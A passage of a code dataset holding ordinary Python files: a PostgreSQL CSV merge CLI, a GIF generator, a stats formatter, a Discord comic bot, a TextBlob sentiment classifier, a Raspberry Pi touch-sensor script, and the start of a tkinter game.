file_format=None, suspend_foreign_keys=False, fail_on_warning=True):\n \"\"\"\n Imports files that introduce new or updated rows. These files have the exact structure\n of the final desired table except that they might be missing rows.\n \"\"\"\n assert len(import_files) == len(dest_tables), \"Files without matching tables\"\n if config_per_table is None:\n config_per_table = {}\n # Use copy of lists since they might be altered and are passed by reference\n import_files = list(import_files)\n dest_tables = list(dest_tables)\n\n # This should be the default (see: http://initd.org/psycopg/docs/connection.html#connection.autocommit)\n # but it helps make it clear that we're follow the PostgreSQL recommendation:\n # https://www.postgresql.org/docs/current/populate.html#DISABLE-AUTOCOMMIT\n connection.autocommit = False\n\n if connection.encoding != 'UTF8':\n # raise ExportException('Database connection encoding isn\\'t UTF8: {}'.format(connection.encoding))\n print(\"WARNING: Setting database connection encoding to UTF8 instead of '{}'\".format(connection.encoding))\n connection.set_client_encoding('UTF8')\n\n cursor = connection.cursor()\n\n tables = sorted(inspector.get_table_names(schema))\n unknown_tables = get_and_warn_about_any_unknown_tables(import_files, dest_tables, tables)\n\n table_graph = db_graph.build_fk_dependency_graph(inspector, schema, tables=None)\n # Sort by dependency requirements\n insertion_order = db_graph.get_insertion_order(table_graph)\n import_pairs = list(zip(import_files, dest_tables))\n import_pairs.sort(key=lambda pair: insertion_order.index(pair[1]))\n # Stats\n total_stats = {'skip': 0, 'insert': 0, 'update': 0, 'total': 0}\n error_tables = list(unknown_tables)\n\n if suspend_foreign_keys:\n db_import.disable_foreign_key_constraints(cursor)\n elif find_and_warn_about_cycles(table_graph, dest_tables) and fail_on_warning:\n log.warning(\"Import cancelled due to detected cycles\")\n return\n\n config_per_subset = convert_to_config_per_subset(config_per_table)\n for file, table in import_pairs:\n print('{}:'.format(get_table_name_with_file(file, table)))\n\n subset_name = only_file_stem(file)\n file_config = config_per_subset.get(subset_name, None)\n try:\n stats = db_import.pg_upsert(inspector, cursor, schema, table, file, file_format,\n file_config=file_config, config_per_table=config_per_table)\n except db_import.UnsupportedSchemaException as exc:\n print(\"\\tSkipping table with unsupported schema: {}\".format(exc))\n error_tables.append(table)\n continue\n\n stat_output = \"\\t skip: {0:<10} insert: {1:<10} update: {2}\".format(\n stats['skip'], stats['insert'], stats['update'])\n if stats['insert'] > 0 or stats['update']:\n click.secho(stat_output, fg='green')\n else:\n print(stat_output)\n total_stats = {k: total_stats.get(k, 0) + stats.get(k, 0) for k in set(total_stats) | set(stats)}\n\n if suspend_foreign_keys:\n db_import.enable_foreign_key_constraints(cursor)\n\n print()\n print(\"Total results:\\n\\t skip: %s \\n\\t insert: %s \\n\\t update: %s \\n\\t total: %s\" %\n (total_stats['skip'], total_stats['insert'], total_stats['update'], total_stats['total']))\n if len(error_tables) > 0:\n print(\"\\n%s tables skipped due to errors:\" % (len(error_tables)))\n print(\"\\t\" + \"\\n\\t\".join(error_tables))\n print(\"\\n%s tables imported successfully\" % (len(dest_tables) - len(error_tables),))\n\n # Transaction is committed\n connection.commit()\n\n\ndef run_in_session(engine, func):\n conn = engine.raw_connection()\n try:\n return func(conn)\n finally:\n conn.close()\n\n\ndef get_import_files_and_tables(directory, tables, config_per_table):\n if config_per_table is None:\n config_per_table = {}\n\n # Determine tables based on files in directory\n all_files = sorted([f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f))])\n import_files = [f for f in all_files if re.match(r\".*\\.csv\", f)]\n dest_tables = [f[:-len('.csv')] for f in import_files]\n\n # Consider subsets in config\n subsets = {table: [subset['name'] for subset in config_per_table[table]['subsets']]\n for table in config_per_table if 'subsets' in config_per_table[table]}\n subset_files = {filename: table for table in subsets for filename in subsets[table]}\n for subset_name in subset_files:\n filename = subset_name + '.csv'\n actual_table = subset_files[subset_name]\n if filename in import_files:\n # Update dest_tables with correct table\n dest_tables[import_files.index(filename)] = actual_table\n\n if tables is not None and len(tables) != 0:\n # Use only selected tables\n import_files = [\"%s.csv\" % (table,) for table in tables]\n dest_tables = tables\n\n # Check that all expected files exist\n expected_table_files = [\"%s.csv\" % (table,) for table in dest_tables]\n unknown_files = set(expected_table_files).difference(set(all_files))\n if len(unknown_files) > 0:\n print(\"No files found for the following tables:\")\n for file in unknown_files:\n print(\"\\t\", file)\n return\n\n # Convert filenames to full paths\n import_files = [os.path.join(directory, f) for f in import_files]\n return import_files, dest_tables\n\n\ndef convert_to_config_per_subset(config_per_table):\n \"\"\"\n Subset configs include parent config and the configs of subset that override those of the parent.\n \"\"\"\n subsets = {table: [subset['name'] for subset in config_per_table[table]['subsets']]\n for table in config_per_table if 'subsets' in config_per_table[table]}\n subsets_configs = {config['name']: config\n for table in config_per_table if 'subsets' in config_per_table[table]\n for config in config_per_table[table]['subsets']}\n subset_to_table = {name: table for table in subsets for name in subsets[table]}\n # Give copy parent configs to all subsets as a base\n config_per_subset = {name: copy.deepcopy(config_per_table[subset_to_table[name]]) for name in subset_to_table}\n for subset_name in subset_to_table:\n del config_per_subset[subset_name]['subsets']\n # Overwrite keys that are defined on subset-level\n subset_config = subsets_configs[subset_name]\n for key in subset_config:\n config_per_subset[subset_name][key] = subset_config[key]\n\n # config_per_file = {(name + '.csv'): config_per_subset[name] for name in config_per_subset}\n return config_per_subset\n\n\ndef validate_schema(inspector, schema):\n if schema is None:\n schema = inspector.default_schema_name\n if schema not in inspector.get_schema_names():\n print(\"Schema not found: '{}'\".format(schema))\n sys.exit()\n return schema\n\n\ndef validate_tables(inspector, schema, tables):\n if len(tables) == 0:\n return None\n all_tables = set(inspector.get_table_names(schema))\n unknown_tables = set(tables) - all_tables\n if len(unknown_tables) > 0:\n print(\"Tables not found in database:\")\n print(\"\\t\" + \"\\n\\t\".join(unknown_tables))\n sys.exit()\n return tables\n\n\ndef check_table_params(ctx, param, value):\n \"\"\"\n Callback function to check table command-line arguments.\n \"\"\"\n assert param.name == 'tables'\n other_flag = 'include_dependent_tables'\n if len(value) == 0 and other_flag in ctx.params and ctx.params[other_flag] is True:\n raise click.UsageError(\n \"Illegal usage: '{}' option is only valid if '{}' arguments have been specified.\"\n .format(other_flag, param.name))\n return value\n\n\ndef load_table_config_or_exit(inspector, schema, config_file_name):\n config_per_table = None\n if config_file_name is not None:\n try:\n config_per_table = load_config_for_tables(config_file_name)\n validate_table_configs_with_schema(inspector, schema, config_per_table)\n except ConfigInvalidException as exc:\n print(exc)\n sys.exit()\n return config_per_table\n\n\ndef generate_single_table_config(directory, tables, config_per_table):\n \"\"\"\n Create a fake config such that all files found in the directory are subsets for the given table.\n \"\"\"\n assert len(tables) == 1\n table_name = tables[0]\n\n all_files = sorted([f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f))])\n import_files = [f for f in all_files if re.match(r\".*\\.csv\", f)]\n\n # Add subsets to config if they don't already exist\n if 'subsets' not in config_per_table[table_name]:\n config_per_table[table_name]['subsets'] = []\n current_subsets = [subset['name'] for subset in config_per_table[table_name]['subsets']]\n for name in import_files:\n if name not in current_subsets:\n config_per_table[table_name]['subsets'].append({'name': name})\n\n dest_tables = [table_name] * len(import_files)\n import_files = [os.path.join(directory, f) for f in import_files]\n return import_files, dest_tables, config_per_table\n\n\n# Shared command line options for connecting to a database\nDB_CONNECT_OPTIONS = [\n click.option('--dbname', '-d', help='Database name to connect to.', required=True),\n click.option('--host', '-h', help='Database server host or socket directory.',\n default='localhost', show_default=True),\n click.option('--port', '-p', help='Database server port.', default='5432', show_default=True),\n click.option('--username', '-U', help='Database user name.', default='postgres', show_default=True),\n click.option('--schema', '-s', default=\"public\", help='Database schema to use.',\n show_default=True),\n click.option('--no-password', '-w', is_flag=True,\n help='Never prompt for password (e.g. peer authentication).'),\n click.option('--password', '-W', hide_input=True, prompt=False, default=None,\n help='Database password (default is to prompt for password or read config).'),\n click.option('--uri', '-L', help='Connection URI can be used instead of specifying parameters separately (also sets --no-password).', required=False)\n]\n\n# Shared command line arguments for importing/exporting tables to a directory\nDIR_TABLES_ARGUMENTS = [\n click.option('--config', '-c', type=click.Path(exists=True, dir_okay=False),\n help='Config file for customizing how tables are imported/exported.'),\n click.option(\n '--include-dependent-tables', '-i', is_flag=True,\n help='When selecting specific tables, also include ' +\n 'all tables on which they depend due to foreign key constraints.'),\n click.argument('directory', nargs=1, type=click.Path(exists=True, file_okay=False)),\n click.argument('tables', default=None, nargs=-1, callback=check_table_params)\n]\n\n\n@click.group(context_settings=dict(max_content_width=120))\n@click.option('--verbose', '-v', is_flag=True, help='Give more verbose output.')\n@click.version_option(version=__version__, message=\"%(prog)s, version %(version)s\\nSimon Muller \")\ndef main(verbose):\n \"\"\"\n Merges data in CSV files into a Postgresql database.\n \"\"\"\n setup_logging(verbose)\n\n\n@main.command()\n@decorate(DB_CONNECT_OPTIONS)\n@decorate(DIR_TABLES_ARGUMENTS)\ndef export(dbname, uri, host, port, username, no_password, password, schema,\n config, include_dependent_tables,\n directory, tables):\n \"\"\"\n Export each table to a CSV file.\n\n If one or more tables are specified then only they will be used, otherwise all tables found will be selected. They\n will all be exported into the given directory.\n \"\"\"\n engine = None\n try:\n if uri:\n no_password = True\n password = retrieve_password(APP_NAME, dbname, host, port, username, password, never_prompt=no_password)\n db_url = generate_url(uri, dbname, host, port, username, password)\n engine = sqlalchemy.create_engine(db_url)\n inspector = sqlalchemy.inspect(engine)\n schema = validate_schema(inspector, schema)\n table_graph = db_graph.build_fk_dependency_graph(inspector, schema, tables=None)\n tables = validate_tables(inspector, schema, tables)\n if include_dependent_tables:\n tables = db_graph.get_all_dependent_tables(table_graph, tables)\n if tables is None:\n tables = sorted(inspector.get_table_names(schema))\n\n config_per_table = load_table_config_or_exit(inspector, schema, config)\n find_and_warn_about_cycles(table_graph, tables)\n\n def export_tables(conn):\n return db_export.export_tables_per_config(conn, inspector, schema, directory, tables,\n config_per_table=config_per_table)\n table_count, file_count = run_in_session(engine, export_tables)\n print(\"Exported {} tables to {} files\".format(table_count, file_count))\n except Exception as exc:\n logging.exception(exc)\n finally:\n if engine is not None:\n engine.dispose()\n\n\n@main.command(name=\"import\")\n@decorate(DB_CONNECT_OPTIONS)\n@click.option('--ignore-cycles', '-f', is_flag=True,\n help='Don\\'t stop import when cycles are detected in schema' +\n ' (will still fail if there are cycles in data)')\n@click.option('--disable-foreign-keys', '-F', is_flag=True,\n help='Disable foreign key constraint checking during import (necessary if you have cycles, but ' +\n 'requires superuser rights).')\n@decorate(DIR_TABLES_ARGUMENTS)\n@click.option('--single-table', is_flag=True,\n help='An import-only option that assumes all files in the directory are the same type and imports ' +\n 'them all into a single table.')\ndef upsert(dbname, uri, host, port, username, no_password, password, schema,\n config, include_dependent_tables, ignore_cycles, disable_foreign_keys,\n single_table, directory, tables):\n \"\"\"\n Import/merge each CSV file into a table.\n\n All CSV files need the same name as their matching table and have to be located in the given directory.\n If one or more tables are specified then only they will be used, otherwise all tables\n found will be selected.\n \"\"\"\n engine = None\n try:\n if uri:\n no_password = True\n password = retrieve_password(APP_NAME, dbname, host, port, username, password, never_prompt=no_password)\n db_url = generate_url(uri, dbname, host, port, username, password)\n engine = sqlalchemy.create_engine(db_url)\n inspector = sqlalchemy.inspect(engine)\n schema = validate_schema(inspector, schema)\n table_graph = db_graph.build_fk_dependency_graph(inspector, schema, tables=None)\n tables = validate_tables(inspector, schema, tables)\n if include_dependent_tables:\n tables = db_graph.get_all_dependent_tables(table_graph, tables)\n\n if single_table and (tables is None or len(tables) == 0):\n print(\"One table has to be specified when using the --single-table option\")\n sys.exit()\n if single_table and len(tables) > 1:\n print(\"Only one table can be specified when using the --single-table option\")\n sys.exit()\n\n config_per_table = load_table_config_or_exit(inspector, schema, config)\n if single_table:\n import_files, dest_tables, config_per_table = generate_single_table_config(directory, tables,\n config_per_table)\n else:\n import_files, dest_tables = get_import_files_and_tables(directory, tables, config_per_table)\n run_in_session(engine, lambda conn:\n import_all_new(conn, inspector, schema, import_files, dest_tables,\n config_per_table=config_per_table,\n suspend_foreign_keys=disable_foreign_keys,\n fail_on_warning=not ignore_cycles))\n except Exception as exc:\n logging.exception(exc)\n finally:\n if engine is not None:\n engine.dispose()\n\n\n@main.command(context_settings=dict(max_content_width=120))\n@click.option('--engine', '-e', help=\"Type of database engine.\", default='postgresql', show_default=True)\n@decorate(DB_CONNECT_OPTIONS)\n@click.option('--warnings', '-w', is_flag=True, help=\"Output any issues detected in database schema.\")\n@click.option('--list-tables', '-t', is_flag=True, help=\"Output all tables found in the given schema.\")\n@click.option('--table-details', '-td', is_flag=True,\n help=\"Output all tables along with column and foreign key information.\")\n@click.option('--cycles', '-c', is_flag=True, help=\"Find and list cycles in foreign-key dependency graph.\")\n@click.option('--insert-order', '-i', is_flag=True,\n help=\"Output the insertion order of tables based on the foreign-key dependency graph. \" +\n \"This can be used by importer scripts if there are no circular dependency issues.\")\n@click.option('--partition', '-pt', is_flag=True,\n help=\"Partition and list sub-graphs of foreign-key dependency graph.\")\n@click.option('--export-graph', '-x', is_flag=True,\n help=\"Output dot format description of foreign-key dependency graph.\" +\n \" To use graphviz to generate a PDF from this format, pipe the output to:\" +\n \" dot -Tpdf > graph.pdf\")\n@click.option('--transferable', '-tf', is_flag=True, help=\"Output info related to table transfers.\")\ndef inspect(engine, dbname, uri, host, port, username, no_password, password, schema,\n warnings, list_tables, table_details, partition,\n cycles, insert_order, export_graph, transferable):\n \"\"\"\n Inspect database schema in various ways.\n\n Defaults to PostgreSQL but should support multiple database engines thanks to SQLAlchemy (see:\n http://docs.sqlalchemy.org/en/latest/dialects/).\n \"\"\"\n _engine = None\n try:\n if uri:\n no_password = True\n password = retrieve_password(APP_NAME, dbname, host, port, username, password, never_prompt=no_password)\n db_url = generate_url(uri, dbname, host, port, username, password, type=engine)\n _engine = sqlalchemy.create_engine(db_url)\n db_inspect.main(_engine, schema,\n warnings, list_tables, table_details, partition,\n cycles, insert_order, export_graph, transferable)\n except Exception as exc:\n logging.exception(exc)\n finally:\n if _engine is not None:\n _engine.dispose()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pgmerge/pgmerge.py","file_name":"pgmerge.py","file_ext":"py","file_size_in_byte":22992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"500000623","text":"import PIL\nfrom PIL import _imaging\nfrom PIL import Image, ImageDraw, ImageFont\nimport hashlib\nimport time\nfrom pathlib import Path\nfrom urllib.parse import urlparse\nfrom urllib.request import urlretrieve\nfrom stat import S_ISREG, ST_CTIME, ST_MODE\nimport requests\nfrom io import BytesIO\nimport sys\nimport os\nimport time\nimport re\nimport textwrap\n\nMAX_THRESHOLD = 30\nMIN_THRESHOLD = 10\n\n\ndef main():\n # if(len(sys.argv) == 1 or sys.argv[1] == ''):\n # print('./src/assets/media/bright/bright_Background.png')\n # return\n\n # Determine if image exists in save files\n location = sys.argv[1]\n save_folder = './saves/bright/'\n save_name = save_folder + hashlib.sha1(location.encode()).hexdigest() + '.gif'\n\n\n # check for already created images\n if(os.path.isfile(save_name)):\n print(save_name)\n return\n \n if(not os.path.isdir(save_folder)):\n Path(save_folder).mkdir(parents=True, exist_ok=True)\n\n if(len(os.listdir(save_folder)) >= MAX_THRESHOLD):\n files = (os.path.join(save_folder, fn)\n for fn in os.listdir(save_folder))\n files = ((os.stat(path), path) for path in files)\n files = ((stat[ST_CTIME], path)\n for stat, path in files if S_ISREG(stat[ST_MODE]))\n\n sorted_files = sorted(files)\n sorted_files.reverse()\n\n # remove oldest files\n for cdate, path in sorted_files[MIN_THRESHOLD-1:]:\n os.remove(path)\n\n # open base images to be used as the layers for the new image\n brights = [\n {\n 'source': Image.open('./src/assets/media/bright/Bright_0.png'),\n 'mask': None,\n 'position': (204, 20),\n 'size': (205, 205),\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_1.png'),\n 'mask': None,\n 'position': (213, 20),\n 'size': (209, 209),\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_2.png'),\n 'mask': None,\n 'position': (215, 20),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_3.png'),\n 'mask': None,\n 'position': (222, 20),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_4.png'),\n 'mask': None,\n 'position': (222, 25),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_5.png'),\n 'mask': None,\n 'position': (224, 25),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_6.png'),\n 'mask': None,\n 'position': (221, 30),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_7.png'),\n 'mask': None,\n 'position': (222, 35),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_8.png'),\n 'mask': None,\n 'position': (222, 35),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_9.png'),\n 'mask': Image.open('./src/assets/media/bright/Bright_9_mask.png'),\n 'position': (222, 35),\n 'size': (225, 225)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_10.png'),\n 'mask': Image.open('./src/assets/media/bright/Bright_10_mask.png'),\n 'position': (26, 52),\n 'size': (204, 204)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_11.png'),\n 'mask': Image.open('./src/assets/media/bright/Bright_11_mask.png'),\n 'position': (0, 38),\n 'size': (193, 193)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_12.png'),\n 'mask': None,\n 'position': (-171, 55),\n 'size': (188, 188)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_13.png'),\n 'mask': None,\n 'position': (0, 0),\n 'size': (0, 0)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_14.png'),\n 'mask': None,\n 'position': (0, 0),\n 'size': (0, 0)\n },\n {\n 'source': Image.open('./src/assets/media/bright/Bright_15.png'),\n 'mask': None,\n 'position': (0, 0),\n 'size': (0, 0)\n }\n\n ]\n\n user_img = None\n animation_frames = []\n\n # determine if this is a URL\n if(urlparse(location).scheme != ''):\n response = requests.get(location)\n\n user_img = Image.open(BytesIO(response.content)).convert('RGBA')\n\n for bright in brights:\n # create a new empty image with alpha, set to base image size\n new_img = Image.new('RGBA', (498, 373))\n\n # paste the initial base image on the frame\n new_img.paste(bright[\"source\"], (0, 0), bright[\"source\"])\n\n if user_img != None and bright[\"size\"] != (0, 0):\n # copy of user image and frame for manipulation\n user_img_copy = user_img\n frame_copy = new_img\n\n # scaling user image to fit mask\n user_img.thumbnail(bright[\"size\"])\n\n # paste the user image onto the temporary frame\n frame_copy.paste(user_img, (\n (int)(bright[\"position\"][0] +\n (bright[\"size\"][0] - user_img.size[0])/2),\n (int)(bright[\"position\"][1] +\n (bright[\"size\"][1] - user_img.size[1])/2)\n ), user_img)\n\n # mask the frame onto the original to get it to fit correctly\n new_img.paste(frame_copy, (0, 0), mask=bright[\"mask\"])\n\n # add frame to the animation frames list\n animation_frames.append(new_img)\n\n # adding 5 additional frames at the end\n for i in range(1, 8):\n animation_frames.append(animation_frames[len(animation_frames) - 1])\n\n # exporting gif\n animation_frames[0].save(save_name,\n save_all=True, append_images=animation_frames[1:], optimize=False, duration=60, loop=0)\n\n print(save_name)\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/scripts/bright.py","file_name":"bright.py","file_ext":"py","file_size_in_byte":6482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"636868707","text":"# -*- coding: utf-8 -*-\nimport csv\n\n\nclass SystemStats(object):\n def __init__(self, stats, system_type):\n self.stats = stats\n self.system_type = system_type\n\n @staticmethod\n def print_stats_header():\n print(\n '{:>6} {:>6} {:>10} {:>12} {:>10} {:>8} {:>10}'\n .format(\n 'Step #', 'CPUs', 'Diameter', 'Diameter_Avg', 'Degree', 'Cost',\n 'Traffic'\n )\n )\n\n def print(self):\n \"\"\" Pretty-print scaling stats \"\"\"\n self.print_stats_header()\n for s in self.stats:\n print(\n '{step:>6} {node_count:>6} {diameter:>10} '\n '{avg_diameter:>12.4f} {degree:>10} {cost:>8} {traffic:>10.4f}'\n .format(\n **s\n )\n )\n\n def to_csv(self, filename):\n \"\"\" Write the stats to a CSV file \"\"\"\n\n # Field names are names of the stats\n field_names = self.stats[0].keys()\n\n # Do not leave empty lines between rows\n with open(filename, 'w', newline='') as csvf:\n writer = csv.DictWriter(csvf, fieldnames=field_names)\n\n writer.writeheader()\n for s in self.stats:\n writer.writerow(s)\n","sub_path":"mpp_evaluator/stats_formatter.py","file_name":"stats_formatter.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"573328967","text":"# bot.py - Entry point of bot\n\n# misc imports\nimport json\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\n# discord imports\nimport discord\nfrom discord.ext import commands\nimport asyncio\n\nimport requests\n\n# mongodb\nimport pymongo\n\n# load config\nfrom config import config\n\n# connect to mongo\nmongo = pymongo.MongoClient(f\"mongodb+srv://{config['mongo_user']}:{config['mongo_pass']}@{config['mongo_host']}/test?retryWrites=true\")[\"comics\"]\n\ndef get_prefix(bot, message):\n prefix = mongo['guilds'].find({'guild_id': str(message.guild.id)}, {'_id': 0, 'prefix': 1}).next()['prefix'] # Get prefix from mongodb\n return commands.when_mentioned_or(prefix)(bot, message)\n\nbot = commands.Bot(command_prefix=get_prefix)\n\ndef add_guild(guild_id):\n # Add the guild to the mongo db\n\n doc = {\n 'guild_id': guild_id,\n 'comic_channel': \"\",\n 'comic_webhook': \"\",\n 'subscribed_comics': [],\n 'prefix': \",\"\n }\n\n mongo['guilds'].insert_one(doc)\n print(f\"Added guild {guild_id} to mongodb\")\n\n@bot.event\nasync def on_ready():\n print(f\"Logged in as {bot.user.name} - {bot.user.id}\")\n update_guild_count()\n # Check if the bot has joined any guilds since it was last launched\n for guild in bot.guilds:\n # See if guilds collection contains a collection whose guild is the guild id\n guild_id = str(guild.id)\n num = mongo[\"guilds\"].count_documents({\"guild_id\": guild_id})\n\n if num == 0:\n add_guild(guild_id)\n \n@bot.event\nasync def on_guild_join(guild):\n guild_id = str(guild.id)\n if mongo['guilds'].count_documents({'guild_id': guild_id}) == 0:\n add_guild(guild_id)\n \n update_guild_count()\n\n@bot.event\nasync def on_guild_remove(guild):\n update_guild_count()\n\ndef update_guild_count():\n requests.post(url=f\"https://discordbots.org/api/bots/{bot.user.id}/stats\", headers={'Authorization': config['discord_bots_token']}, data={'server_count': len(bot.guilds)})\n\nif __name__ == \"__main__\":\n bot.remove_command(\"help\")\n bot.load_extension(\"admin\")\n bot.load_extension(\"comic\")\n bot.load_extension(\"settings\")\n bot.run(config['bot_token'], bot=True)","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"162856099","text":"#This script is the classification script for Textblob that was used for its final sentiment analysis results.\n\nimport csv \nfrom textblob import TextBlob\n\npredicted_labels = []\ntweets = []\n\ndef sentiment(file, proFile):\n with open(file, 'r', encoding=\"utf-8\") as csvFile:\n reader = csv.reader(csvFile, delimiter=\",\")\n for row in reader:\n tweets.append(row)\n text = row[1] \n analysis = TextBlob(text)\n if analysis.sentiment[0] < 0:\n predicted_label = \"negative\"\n predicted_labels.append(predicted_label)\n else:\n predicted_label = \"positive\"\n predicted_labels.append(predicted_label)\n\n idx = 0\n while idx < len(predicted_labels):\n tweets[idx].append(predicted_labels[idx])\n print(tweets[idx])\n idx = idx + 1\n\n with open(proFile, 'w', encoding=\"utf-8\", newline=\"\") as csvFile:\n writer = csv.writer(csvFile, delimiter=\",\")\n for row in tweets:\n writer.writerow(row)\n \n\n\nsentiment('amazon_tweets_processed.csv', 'amazon_textblob.csv')#Change these outputs depending on what data was being classified.\nprint(tweets)","sub_path":"Python Scripts/Classifiers/Text Blob Classifier.py","file_name":"Text Blob Classifier.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"109377946","text":"import RPi.GPIO as GPIO\nimport time\nimport requests\nimport sys\nimport numpy as np\nimport socket\nimport sensor.tail_servo_main as tail_servo_main\nimport dataCenter\n\n#initialise a previous input variable to 0 (Assume no pressure applied)\nglobal prev_head_touch, prev_body_touch\nprev_head_touch = False\nprev_body_touch = False\n\nglobal touch_count\ntouch_count = 0\n\nGPIO.setmode(GPIO.BOARD)\n\ndef request_touch():\n global touch_count\n data = {'user_id' : dataCenter.user_id, 'sensor_id': dataCenter.touch, 'num' : touch_count, 'day': 'Sunday'}\n # data = {'user_id' : 1, 'sensor_id': 5, 'num' : touch_count, 'day': 'Sunday'}\n requests.post(dataCenter.URL, json=data)\n touch_count = 0\n print(touch_count)\n\ndef setup_touch(head_touch_pin, body_touch_pin):\n # set up pins\n GPIO.setup(head_touch_pin,GPIO.IN)\n GPIO.setup(body_touch_pin,GPIO.IN)\n\n return head_touch_pin, body_touch_pin\n\ndef cleanup_touch(head_touch_pin, body_touch_pin):\n GPIO.cleanup(head_touch_pin)\n GPIO.cleanup(body_touch_pin)\n\ndef check_touch(head_touch_pin, body_touch_pin):\n head_touch = GPIO.input(head_touch_pin)\n body_touch = GPIO.input(body_touch_pin)\n return head_touch, body_touch\n\ndef main():\n # setup pins\n body_servo, tail_servo = tail_servo_main.setup_tail(dataCenter.body_pin, dataCenter.tail_pin)\n head_touch_pin, body_touch_in = setup_touch(dataCenter.head_touch_pin, dataCenter.body_touch_pin)\n # body_servo, tail_servo = tail_servo_main.setup_tail(36, 38)\n # head_touch_pin, body_touch_pin = setup_touch(11, 13)\n while True:\n global touch_count\n global prev_head_touch, prev_body_touch\n head_touch, body_touch = check_touch(dataCenter.head_touch_pin, dataCenter.body_touch_pin)\n # head_touch, body_touch = check_touch(11, 13)\n #check_touch(input_head, input_body)\n if (prev_head_touch and (not prev_body_touch)) and body_touch:\n print(\"head to body\")\n # touch_count += 1\n # shake tail\n #tail_servo_main.shake_tail(body_servo, tail_servo)\n elif (prev_body_touch and (not prev_head_touch)) and head_touch:\n print(\"body to head\")\n # touch_count += 1 \n elif (not prev_head_touch) and head_touch:\n print(\"only head\")\n elif (not prev_body_touch) and body_touch:\n print(\"only body\")\n tail_servo_main.shake_tail(body_servo, tail_servo)\n touch_count += 1\n\n #update previous input\n prev_head_touch = head_touch\n prev_body_touch = body_touch\n\n time.sleep(0.1)\n tail_servo_main.cleanup_tail(dataCenter.body_pin, dataCenter.tail_pin)\n cleanup_touch(dataCenter.head_pin, dataCenter.body_pin)\n # tail_servo_main.cleanup_tail(36, 38)\n # cleanup_touch(11, 13)\n\nif __name__ == \"__main__\":\n main()","sub_path":"robot109/sensor/touch_main.py","file_name":"touch_main.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"274713551","text":"# --------------------------------------------------- #\n# -------------------- IMPORTS\n\nimport webbrowser\n\nfrom joueur import Head\nfrom variables import *\nfrom tkinter import Toplevel, Label, Button, Frame, LEFT, BOTH, messagebox\n\n\n# --------------------------------------------------- #\n# -------------------- FUNCTION FENETRE\n\n# -------------------- affichage en cas d'erreur\ndef help_clignotante(root):\n\n def erreur_en_cours_to_false():\n root.erreur_en_cours = False\n\n def affiche_message_erreur_menu(n):\n if n == 0:\n help_menu.add_cascade(label='<-- game.ERROR : mauvaise manip\\'', font=FONT_IMPORTANT)\n elif n == 1:\n help_menu.add_cascade(label='<-- game.ERROR : mauvaise manip\\' x2', font=FONT_IMPORTANT)\n elif n == 2:\n help_menu.add_cascade(label='<-- game.ERROR : mauvaise manip\\' x3 (dernière fois...)', font=FONT_IMPORTANT)\n else:\n help_menu.master.destroy()\n\n root.nombre_erreur += 1\n if root.nombre_erreur % 3 == 0:\n messagebox.showerror(\"Erreur de manipulation\", ERREUR_MSG)\n \n elif not root.erreur_en_cours:\n root.erreur_en_cours = True\n help_menu = root.master.master.master.children['!menu']\n help_menu._tclCommands = list()\n for i in range(0, 4000, 1000):\n help_menu.after(i, affiche_message_erreur_menu, root.nombre_erreur//3)\n help_menu.after(500+i, help_menu.delete, 'end') \n root.after(4000, erreur_en_cours_to_false)\n return None\n\n\n# -------------------- changement des options par défauts de tkinter\ndef set_options(root):\n root.option_add(\"*Font\", FONT_NORMAL)\n root.option_add(\"*Background\", BG_COLOR)\n root.option_add(\"*Foreground\", COLOR_2)\n root.resizable(width=False, height=False)\n root.geometry(\"%dx%d\" % (SCREEN_WIDTH, SCREEN_HEIGHT))\n return None\n\n\n# -------------------- parce que c'est marrant <<< EASTER EGG >>>\ndef webpage(event, n):\n if n == 0:\n webbrowser.open_new(r\"https://en.wikipedia.org/wiki/Blockade_(video_game)\")\n else:\n webbrowser.open_new(r\"https://mime.univ-lille.fr/formation/licence-miashs/\")\n return None\n\n\n# --------------------\ndef komenkonjou():\n toplevel = Toplevel()\n frame = Frame(toplevel)\n \n Label(frame, text=TITRE_REGLES).pack()\n Label(frame, text=REGLES, justify=\"left\", font=FONT_MENU).pack()\n Button(frame,\n text='Regles spéciales pour notre professeur adoré',\n command=lambda: komenkonjou_specialprof(toplevel)).pack(pady=(20, 0))\n\n frame.pack(ipadx=10, ipady=10, padx=10, pady=10)\n return None\n\n\n# --------------------\ndef komenkonjou_specialprof(sublevel=None):\n if sublevel is not None:\n sublevel.destroy()\n\n toplevel = Toplevel()\n\n frame = Frame(toplevel)\n Label(frame, text=TITRE_REGLES_PROF).pack()\n Label(frame, text=REGLES_PROF, font=FONT_MENU).pack()\n frame.pack(ipadx=5, ipady=5, 